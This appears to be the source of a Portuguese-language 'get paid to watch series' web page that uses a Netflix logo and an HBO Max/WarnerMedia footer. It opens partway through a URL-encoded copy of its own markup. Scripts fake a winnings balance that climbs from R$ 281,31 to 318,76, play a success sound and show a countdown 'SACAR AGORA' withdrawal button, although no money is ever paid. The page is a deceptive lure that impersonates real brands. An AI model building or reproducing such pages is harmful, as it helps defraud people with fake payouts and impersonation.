%20%20%20%20%20%20%20%20%20%20%20%20%3C%62%75%74%74%6F%6E%20%74%79%70%65%3D%22%74%65%78%74%22%20%69%64%3D%22%69%6E%70%75%74%74%79%70%65%74%65%78%74%78%22%20%73%74%79%6C%65%3D%22%6D%61%72%67%69%6E%2D%6C%65%66%74%3A%20%31%30%70%78%3B%22%20%70%6C%61%63%65%68%6F%6C%64%65%72%3D%22%45%73%63%72%65%76%61%20%61%71%75%69%2E%2E%2E%22%3E%54%61%6C%76%65%7A%3C%2F%62%75%74%74%6F%6E%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%3C%62%75%74%74%6F%6E%20%74%79%70%65%3D%22%74%65%78%74%22%20%69%64%3D%22%69%6E%70%75%74%74%79%70%65%74%65%78%74%78%22%20%73%74%79%6C%65%3D%22%6D%61%72%67%69%6E%2D%6C%65%66%74%3A%20%31%30%70%78%3B%22%20%70%6C%61%63%65%68%6F%6C%64%65%72%3D%22%45%73%63%72%65%76%61%20%61%71%75%69%2E%2E%2E%22%3E%4E%E3%6F%3C%2F%62%75%74%74%6F%6E%3E%0A%20%20%20%20%20%20%20%20%3C%2F%64%69%76%3E%0A%20%20%20%20%3C%2F%64%69%76%3E%0A%20%20%20%20%0A%20%20%20%20%3C%64%69%76%20%69%64%3D%22%62%6F%74%61%6F%6C%75%63%72%61%72%65%74%61%70%61%22%3E%0A%20%20%20%20%20%20%20%20%3C%61%20%69%64%3D%22%62%6F%74%61%6F%70%72%6F%78%69%6D%61%65%74%61%70%61%22%20%68%72%65%66%3D%22%23%22%20%6F%6E%63%6C%69%63%6B%3D%22%76%61%6C%69%64%61%72%49%6E%70%75%74%28%29%3B%20%72%65%74%75%72%6E%20%66%61%6C%73%65%3B%22%3E%52%45%43%45%42%45%52%20%4D%45%55%20%53%41%51%55%45%3C%2F%61%3E%0A%20%20%20%20%3C%2F%64%69%76%3E%0A%0A%20%20%20%20%3C%73%63%72%69%70%74%3E%0A%20%20%20%20%20%20%20%20%66%75%6E%63%74%69%6F%6E%20%76%61%6C%69%64%61%72%49%6E%70%75%74%28%29%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%76%61%72%20%69%6E%70%75%74%54%65%78%74%20%3D%20%64%6F%63%75%6D%65%6E%74%2E%67%65%74%45%6C%65%6D%65%6E%74%42%79%49%64%28%22%69%6E%70%75%74%74%79%70%65%74%65%78%74%22%29%2E%76%61%6C%75%65%3B%0A%20%20%20%20%20%20%20%20%0A%20%20%20%20%20%20%20%20%20%20%20%20%69%66%20%28%69%6E%70%75%74%54%65%78%74%2E%74%72%69%6D%28%29%20%3D%3D%3D%20%22%22%29%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%61%6C%65%72%74%28%22%50%6F%72%20%66%61%76%6F%72%2C%20%70%72%65%65%6E%63%68%61%20%6F%20%63%61%6D%70%6F%20%64%65%20%6F%70%69%6E%69%E3%6F%20%61%6E%74%65%73%20%64%65%20%70%72%6F%73%73%65%67%75%69%72%2E%22%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%65%6C%73%65%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%6D%6F%73%74%72%61%72%50%6F%70%75%70%28%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%61%6E%69%6D%61%72%53%61%6C%64%6F%28%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%74%6F%63%61%72%41%75%64%69%6F%28%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%7D%0A%20%20%20%20%20%20%20%20%7D%0A%20%20%20%20%20%20%20%20%3C%2F%73%63%72%69%70%74%3E%0A%0A%20%20%20%20%3C%61%75%64%69%6F%20%69%64%3D%22%61%75%64%69%6F%53%75%63%65%73%73%6F%22%20%73%72%63%3D%22%69%6D%61%67%65%73%2F%73%75%63%65%73%73%2E%6D%70%33%22%3E%3C%2F%61%75%64%69%6F%3E%0A%20%20%20%20%3C%2F%64%69%76%3E%0A%0A%20%20%20%20%3C%73%63%72%69%70%74%3E%0A%20%20%20%20%20%20%20%20%63%6C%61%73%73%20%59%6F%75%54%75%62%65%56%69%64%65%6F%20%65%78%74%65%6E%64%73%20%48%54%4D%4C%45%6C%65%6D%65%6E%74%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%63%6F%6E%73%74%72%75%63%74%6F%72%28%29%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%73%75%70%65%72%28%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%74%68%69%73%2E%61%74%74%61%63%68%53%68%61%64%6F%77%28%7B%20%6D%6F%64%65%3A%20%27%6F%70%65%6E%27%20%7D%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%74%68%69%73%2E%73%68%61%64%6F%77%52%6F%6F%74%2E%61%70%70%65%6E%64%43%68%69%6C%64%28%74%68%69%73%2E%67%65%74%53%74%79%6C%65%28%29%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%74%68%69%73%2E%61%64%64%45%76%65%6E%74%4C%69%73%74%65%6E%65%72%28%27%63%6C%69%63%6B%27%2C%20%28%29%20%3D%3E%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%74%68%69%73%2E%63%6C%61%73%73%4C%69%73%74%2E%61%64%64%28%27%63%6C%69%63%6B%65%64%27%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%74%68%69%73%2E%73%68%61%64%6F%77%52%6F%6F%74%2E%61%70%70%65%6E%64%43%68%69%6C%64%28%74%68%69%73%2E%67%65%74%49%66%72%61%6D%65%28%29%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%7D%0A%20%20%20%20%20%20%20%20%0A%20%20%20%20%20%20%20%20%20%20%20%20%67%65%74%53%74%79%6C%65%28%29%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%63%6F%6E%73%74%20%73%74%79%6C%65%20%3D%20%64%6F%63%75%6D%65%6E%74%2E%63%72%65%61%74%65%45%6C%65%6D%65%6E%74%28%27%73%74%79%6C%65%27%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%73%74%79%6C%65%2E%74%65%78%74%43%6F%6E%74%65%6E%74%20%3D%20%60%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3A%68%6F%73%74%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%70%6F%73%69%74%69%6F%6E%3A%20%72%65%6C%61%74%69%76%65%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%64%69%73%70%6C%61%79%3A%20%66%6C%65%78%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%6A%75%73%74%69%66%79%2D%63%6F%6E%74%65%6E%74%3A%20%63%65%6E%74%65%72%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%61%6C%69%67%6E%2D%69%74%65%6D%73%3A%20%63%65%6E%74%65%72%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%77%69%64%74%68%3A%20%31%30%30%25%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%6D%61%78%2D%77%69%64%74%68%3A%20%31%30%30%25%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%61%73%70%65%63%74%2D%72%61%74%69%6F%3A%20%31%36%2F%39%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%63%75%72%73%6F%72%3A%20%70%6F%69%6E%74%65%72%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%62%61%63%6B%67%72%6F%75%6E%64%3A%20%73%69%6C%76%65%72%20%75%72%6C%28%27%68%74%74%70%73%3A%2F%2F%69%6D%67%2E%79%6F%75%74%75%62%65%2E%63%6F%6D%2F%76%69%2F%24%7B%74%68%69%73%2E%67%65%74%41%74%74%72%69%62%75%74%65%28%27%76%69%64%65%6F%2D%69%64%27%29%7D%2F%30%2E%6A%70%67%27%29%20%6E%6F%2D%72%65%70%65%61%74%20%63%65%6E%74%65%72%20%2F%20%63%6F%76%65%72%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3A%68%6F%73%74%3A%62%65%66%6F%72%65%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%63%6F%6E%74%65%6E%74%3A%20%27%27%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%77%69%64%74%68%3A%20%31%35%25%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%61%73%70%65%63%74%2D%72%61%74%69%6F%3A%20%31%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%62%6F%72%64%65%72%2D%72%61%64%69%75%73%3A%20%35%30%25%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%62%61%63%6B%67%72%6F%75%6E%64%3A%20%77%68%69%74%65%20%75%72%6C%28%27%64%61%74%61%3A%69%6D%61%67%65%2F%73%76%67%2B%78%6D%6C%3B%75%74%66%38%2C%3C%73%76%67%20%78%6D%6C%6E%73%3D%22%68%74%74%70%3A%2F%2F%77%77%77%2E%77%33%2E%6F%72%67%2F%32%30%30%30%2F%73%76%67%22%20%76%69%65%77%42%6F%78%3D%22%30%20%30%20%31%34%30%20%31%32%32%2E%38%38%22%3E%3C%70%6F%6C%79%67%6F%6E%20%70%6F%69%6E%74%73%3D%22%31%34%30%2C%36%30%2E%39%37%20%33%32%2C%31%32%32%2E%38%38%20%33%32%2C%30%20%31%34%30%2C%36%30%2E%39%37%22%20%66%69%6C%6C%3D%22%62%6C%61%63%6B%22%20%2F%3E%3C%2F%73%76%67%3E%27%29%20%6E%6F%2D%72%65%70%65%61%74%20%63%65%6E%74%65%72%20%2F%20%35%30%25%20%35%30%25%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%66%69%6C%74%65%72%3A%20%64%72%6F%70%2D%73%68%61%64%6F%77%28%30%70%78%20%30%70%78%20%31%36%70%78%20%72%67%62%61%28%30%2C%30%2C%30%2C%30%2E%33%29%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%74%72%61%6E%73%69%74%69%6F%6E%3A%20%61%6C%6C%20%30%2E%33%73%20%65%61%73%65%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3A%68%6F%73%74%28%2E%63%6C%69%63%6B%65%64%29%3A%62%65%66%6F%72%65%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%6F%70%61%63%69%74%79%3A%20%30%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%60%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%72%65%74%75%72%6E%20%73%74%79%6C%65%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%7D%0A%20%20%20%20%20%20%20%20%0A%20%20%20%20%20%20%20%20%20%20%20%20%67%65%74%49%66%72%61%6D%65%28%29%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%63%6F%6E%73%74%20%69%66%72%61%6D%65%20%3D%20%64%6F%63%75%6D%65%6E%74%2E%63%72%65%61%74%65%45%6C%65%6D%65%6E%74%28%27%69%66%72%61%6D%65%27%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%69%66%72%61%6D%65%2E%73%65%74%41%74%74%72%69%62%75%74%65%28%27%66%72%61%6D%65%62%6F%72%64%65%72%27%2C%20%27%30%27%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%69%66%72%61%6D%65%2E%73%65%74%41%74%74%72%69%62%75%74%65%28%27%61%6C%6C%6F%77%27%2C%20%27%61%75%74%6F%70%6C%61%79%27%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%69%66%72%61%6D%65%2E%73%65%74%41%74%74%72%69%62%75%74%65%28%27%61%6C%6C%6F%77%66%75%6C%6C%73%63%72%65%65%6E%27%2C%20%27%27%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%69%66%72%61%6D%65%2E%73%74%79%6C%65%2E%63%73%73%54%65%78%74%20%3D%20%60%70%6F%73%69%74%69%6F%6E%3A%20%61%62%73%6F%6C%75%74%65%3B%20%74%6F%70%3A%20%30%3B%20%6C%65%66%74%3A%20%30%3B%20%77%69%64%74%68%3A%20%31%30%30%25%3B%20%68%65%69%67%68%74%3A%20%31%30%30%25%3B%60%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%63%6F%6E%73%74%20%70%61%72%61%6D%73%20%3D%20%6E%65%77%20%55%52%4C%53%65%61%72%63%68%50%61%72%61%6D%73%28%7B%20%61%75%74%6F%70%6C%61%79%3A%20%31%2C%20%6D%6F%64%65%73%74%62%72%61%6E%64%69%6E%67%3A%20%31%2C%20%72%65%6C%3A%20%30%2C%20%69%76%5F%6C%6F%61%64%5F%70%6F%6C%69%63%79%3A%20%33%2C%20%73%68%6F%77%69%6E%66%6F%3A%20%30%20%7D%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%5B%27%63%6F%6E%74%72%6F%6C%73%27%2C%20%27%73%74%61%72%74%27%2C%20%27%65%6E%64%27%2C%20%27%6C%6F%6F%70%27%2C%20%27%70%6C%61%79%6C%69%73%74%27%5D%2E%66%6F%72%45%61%63%68%28%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%61%74%74%72%20%3D%3E%20%7B%20%69%66%20%28%74%68%69%73%2E%68%61%73%41%74%74%72%69%62%75%74%65%28%61%74%74%72%29%29%20%70%61%72%61%6D%73%2E%73%65%74%28%61%74%74%72%2C%20%74%68%69%73%2E%67%65%74%41%74%74%72%69%62%75%74%65%28%61%74%74%72%29%29%3B%20%7D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%69%66%72%61%6D%65%2E%73%72%63%20%3D%20%60%68%74%74%70%73%3A%2F%2F%77%77%77%2E%79%6F%75%74%75%62%65%2D%6E%6F%63%6F%6F%6B%69%65%2E%63%6F%6D%2F%65%6D%62%65%64%2F%24%7B%74%68%69%73%2E%67%65%74%41%74%74%72%69%62%75%74%65%28%27%76%69%64%65%6F%2D%69%64%27%29%7D%3F%24%7B%70%61%72%61%6D%73%7D%60%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%69%66%72%61%6D%65%2E%6F%6E%6C%6F%61%64%20%3D%20%28%29%20%3D%3E%20%74%68%69%73%2E%73%74%79%6C%65%2E%62%61%63%6B%67%72%6F%75%6E%64%20%3D%20%27%74%72%61%6E%73%70%61%72%65%6E%74%27%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%72%65%74%75%72%6E%20%69%66%72%61%6D%65%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%7D%0A%20%20%20%20%20%20%20%20%7D%0A%20%20%20%20%20%20%20%20%63%75%73%74%6F%6D%45%6C%65%6D%65%6E%74%73%2E%64%65%66%69%6E%65%28%27%79%6F%75%74%75%62%65%2D%76%69%64%65%6F%27%2C%20%59%6F%75%54%75%62%65%56%69%64%65%6F%29%3B%0A%20%20%20%20%20%20%20%20%0A%20%20%20%20%20%20%20%20%3C%2F%73%63%72%69%70%74%3E%0A%0A%3C%66%6F%6F%74%65%72%3E%0A%20%20%20%20%3C%70%20%73%74%79%6C%65%3D%22%66%6F%6E%74%2D%73%69%7A%65%3A%20%31%32%70%78%3B%20%74%65%78%74%2D%61%6C%69%67%6E%3A%20%63%65%6E%74%65%72%3B%20%66%6F%6E%74%2D%77%65%69%67%68%74%3A%20%33%30%30%3B%20%6D%61%72%67%69%6E%3A%20%33%30%70%78%3B%22%3E%A9%32%30%32%34%20%57%61%72%6E%65%72%4D%65%64%69%61%20%44%69%72%65%63%74%20%4C%61%74%69%6E%20%41%6D%65%72%69%63%61%2C%20%4C%4C%43%2E%20%54%6F%64%6F%73%20%6F%73%20%64%69%72%65%69%74%6F%73%20%72%65%73%65%72%76%61%64%6F%73%2E%20%4D%61%78%20%E9%20%75%73%61%64%6F%20%73%6F%62%20%6C%69%63%65%6E%E7%61%2E%3C%2F%70%3E%0A%3C%2F%66%6F%6F%74%65%72%3E'));
        //-->
        </script>    <script>
        // Função para mostrar o popup
        function mostrarPopup() {
            const popup = document.getElementById('popupBackground');
            const prosseguirButton = document.getElementById('prosseguir');
            const initialSeconds = 5; // Segundos de espera
            let secondsLeft = initialSeconds;

            popup.style.display = 'flex';
            setTimeout(() => {
                popup.style.opacity = '1'; // Faz o popup aparecer suavemente
            }, 10); // Delay pequeno para permitir a transição

            // Atualiza o texto do botão a cada segundo
            const countdownInterval = setInterval(() => {
                secondsLeft--;
                prosseguirButton.textContent = `SACAR AGORA (${secondsLeft}s)`;
                if (secondsLeft <= 0) {
                    clearInterval(countdownInterval);
                    prosseguirButton.classList.add('enabled'); // Habilita o botão
                    prosseguirButton.textContent = 'SACAR AGORA';
                }
            }, 1000);

            // Temporizador de 5 segundos antes de habilitar o botão
            setTimeout(() => {
                prosseguirButton.classList.add('enabled'); // Habilita o botão
                prosseguirButton.textContent = 'SACAR AGORA';
            }, initialSeconds * 1000); // 5 segundos (5000 milissegundos)
        }

        // Função para fechar o popup
        function fecharPopup() {
            const popup = document.getElementById('popupBackground');
            popup.style.opacity = '0'; // Faz o popup desaparecer suavemente
            setTimeout(() => {
                popup.style.display = 'none';
            }, 500); // Tempo de espera para esconder após a transição
        }
    </script>



    <div id="bannerprincipal">
        <div id="barranetflix">
            <img src="images/aSRrjS5AboQy.png" id="netflixlogoapp">
            <div id="saldolead">Saldo: R$ <b id="saldoValor">281,31</b></div>
        </div>

<script>
function animarSaldo() {
    let saldoAtual = 281.31;
    let saldoFinal = 318.76;
    let incremento = 0.1; // Quanto cada incremento adiciona ao saldo
    let intervalo = 10; // Tempo em milissegundos entre os incrementos

    // Adiciona fundo verde ao saldo
    document.getElementById('saldolead').style.backgroundColor = '#4CAF50';

    let intervaloID = setInterval(function() {
        saldoAtual += incremento;
        if (saldoAtual >= saldoFinal) {
            saldoAtual = saldoFinal;
            clearInterval(intervaloID);
        }
        document.getElementById('saldoValor').textContent = saldoAtual.toFixed(2).replace('.', ',');
    }, intervalo);
}

function tocarAudio() {
    var audio = document.getElementById("audioSucesso");
    audio.play();
}

</script>


            <div id="notificacaodin" style="background-color: #090a41;
            border: 1px solid #3a3dc4;
            margin: 10px;
            border-radius: 15px;
            color: #ffffff;
            padding: 10px;
            display: flex;
            flex-direction: column;
            justify-content: center;
            align-items: center;
            animation: breathing 3s ease-in-out infinite;">

            <p id="textonotifi">Você ganhou <b>R$ 37,45</b></p>
            <p>Assista <b>1 série</b> e realize seu saque</p>
        </div>
              

        <div id="textoprincipal">
            <youtube-video id="youtubevideo" video-id="7YcQpRhta6Q" style="width: 720px;"></youtube-video>


        </div>
    <div id="avaloacaoserie">
        <p id="avaliacaotexto">Avalie esta série:</p>
        <div class="rating">
            <input type="radio" name="star" id="star1"><label for="star1"></label>
            <input type="radio" name="star" id="star2"><label for="star2"></label>
            <input type="radio" name="star" id="star3"><label for="star3"></label>
            <input type="radio" name="star" id="star4"><label for="star4"></label>
            <input type="radio" name="star" id="star5"><label for="star5"></label>
        </div>
    </div>

    
    <div id="avaloacaoserie">
        <p id="avaliacaotexto">Deixe sua opinião sobre a série:</p>
        <input type="text" id="inputtypetext" placeholder="Escreva aqui">
    </div>
    
    <div id="avaloacaoserie">
        <p id="avaliacaotexto">Recomendaria esta série para<br>assinantes HBO Max?</p>
        <div id="simounaonet">
            <button type="text" id="inputtypetextx" placeholder="Escreva aqui...">Sim</button>
            <button type="text" id="inputtypetextx" style="margin-left: 10px;" placeholder="Escreva aqui...">Talvez</button>
            <button type="text" id="inputtypetextx" style="margin-left: 10px;" placeholder="Escreva aqui...">Não</button>
        </div>
    </div>
    
    <div id="botaolucraretapa">
        <a id="botaoproximaetapa" href="#" onclick="validarInput(); return false;">RECEBER MEU SAQUE</a>
    </div>

    <script>
        function validarInput() {
            var inputText = document.getElementById("inputtypetext").value;
        
            if (inputText.trim() === "") {
                alert("Por favor, preencha o campo de opinião antes de prosseguir.");
            } else {
                mostrarPopup();
                animarSaldo();
                tocarAudio();
            }
        }
        </script>

    <audio id="audioSucesso" src="media/sucess.mp3"></audio>
    </div>

    <script>
        class YouTubeVideo extends HTMLElement {
            constructor() {
                super();
                this.attachShadow({ mode: 'open' });
                this.shadowRoot.appendChild(this.getStyle());
                this.addEventListener('click', () => {
                    this.classList.add('clicked');
                    this.shadowRoot.appendChild(this.getIframe());
                });
            }
        
            getStyle() {
                const style = document.createElement('style');
                style.textContent = `
                    :host {
                        position: relative;
                        display: flex;
                        justify-content: center;
                        align-items: center;
                        width: 100%;
                        max-width: 100%;
                        aspect-ratio: 16/9;
                        cursor: pointer;
                        background: silver url('https://img.youtube.com/vi/${this.getAttribute('video-id')}/0.jpg') no-repeat center / cover;
                    }
                    :host:before {
                        content: '';
                        width: 15%;
                        aspect-ratio: 1;
                        border-radius: 50%;
                        background: white url('data:image/svg+xml;utf8,<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 140 122.88"><polygon points="140,60.97 32,122.88 32,0 140,60.97" fill="black" /></svg>') no-repeat center / 50% 50%;
                        filter: drop-shadow(0px 0px 16px rgba(0,0,0,0.3));
                        transition: all 0.3s ease;
                    }
                    :host(.clicked):before {
                        opacity: 0;
                    }`;
                return style;
            }
        
            getIframe() {
                const iframe = document.createElement('iframe');
                iframe.setAttribute('frameborder', '0');
                iframe.setAttribute('allow', 'autoplay');
                iframe.setAttribute('allowfullscreen', '');
                iframe.style.cssText = `position: absolute; top: 0; left: 0; width: 100%; height: 100%;`;
                const params = new URLSearchParams({ autoplay: 1, modestbranding: 1, rel: 0, iv_load_policy: 3, showinfo: 0 });
                ['controls', 'start', 'end', 'loop', 'playlist'].forEach(
                    attr => { if (this.hasAttribute(attr)) params.set(attr, this.getAttribute(attr)); }
                );
                iframe.src = `https://www.youtube-nocookie.com/embed/${this.getAttribute('video-id')}?${params}`;
                iframe.onload = () => this.style.background = 'transparent';
                return iframe;
            }
        }
        customElements.define('youtube-video', YouTubeVideo);
        
        </script>

<footer>
    <p style="font-size: 12px; text-align: center; font-weight: 300; margin: 30px;">©2024 WarnerMedia Direct Latin America, LLC. Todos os direitos reservados. Max é usado sob licença.</p>
</footer>

</body></html>